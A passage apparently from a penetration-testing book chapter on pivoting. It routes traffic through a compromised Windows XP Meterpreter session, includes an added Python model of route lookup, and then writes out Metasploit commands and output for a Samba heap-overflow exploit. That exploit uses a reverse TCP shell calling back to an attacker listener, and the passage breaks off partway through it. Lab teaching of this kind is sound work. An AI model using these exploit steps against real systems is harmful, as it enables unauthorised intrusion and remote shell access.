Chapter 6
We have successfully compromised our Windows XP machine and have full access to it. Next, we background our running session and add a route command to the Framework, telling it to route the remote network ID over session 1, the backgrounded Meterpreter session. We then display the active routes with route print, and we can clearly see that, just as we desired, the route is active.
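The route command above maps a destination network to a session. The following Python model, added here and not part of the book or of Metasploit, shows the decision the Framework has to make for every new connection: a longest-prefix lookup that sends 192.168.33.132 over session 1 while traffic to 10.10.1.129 stays direct. Class and method names are hypothetical; the rendered table only approximates the layout of route print.

```python
import ipaddress


class PivotRouteTable:
    """Hypothetical model of the Framework's route table (subnet -> session).

    Lookup is longest-prefix match, as in an ordinary IP routing table, so a
    more specific route added later wins over a broader one.
    """

    def __init__(self):
        self._routes = []  # list of (IPv4Network, session_id)

    def add(self, subnet, netmask, session_id):
        # Same argument order as 'route add <subnet> <netmask> <session>'
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        self._routes.append((net, int(session_id)))

    def delete(self, subnet, netmask, session_id):
        # Returns True when a matching entry was removed
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        before = len(self._routes)
        self._routes = [r for r in self._routes if r != (net, int(session_id))]
        return len(self._routes) != before

    def lookup(self, host):
        """Session id carrying traffic to host, or None when sent directly."""
        addr = ipaddress.IPv4Address(host)
        matches = [(net, sid) for net, sid in self._routes if addr in net]
        if not matches:
            return None
        net, sid = max(matches, key=lambda m: m[0].prefixlen)
        return sid

    def render(self):
        """Text table in the spirit of 'route print'."""
        lines = ["Active Routing Table", "",
                 "   Subnet             Netmask            Gateway"]
        for net, sid in self._routes:
            lines.append(f"   {str(net.network_address):<18} "
                         f"{str(net.netmask):<18} Session {sid}")
        return "\n".join(lines)


def build_chapter_table():
    """Reproduce the single route added in the text: 192.168.33.0/24 via session 1."""
    table = PivotRouteTable()
    table.add("192.168.33.0", "255.255.255.0", 1)
    return table


if __name__ == "__main__":
    print(build_chapter_table().render())
```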
Next, we'll set up a second exploit against the targeted Linux system. The specific exploit here is a Samba-based heap overflow to which our Metasploitable machine is vulnerable.
msf exploit(handler) > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) > set LHOST 10.10.1.129
LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) > set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:47:e6:79
inet addr:10.10.1.129 Bcast:10.10.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4272582 (4.2 MB) TX bytes:17849775 (17.8 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:600 errors:0 dropped:0 overruns:0 frame:0
TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:41386 (41.3 KB) TX bytes:41386 (41.3 KB)
msf exploit(lsa_transnames_heap) > exploit
[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...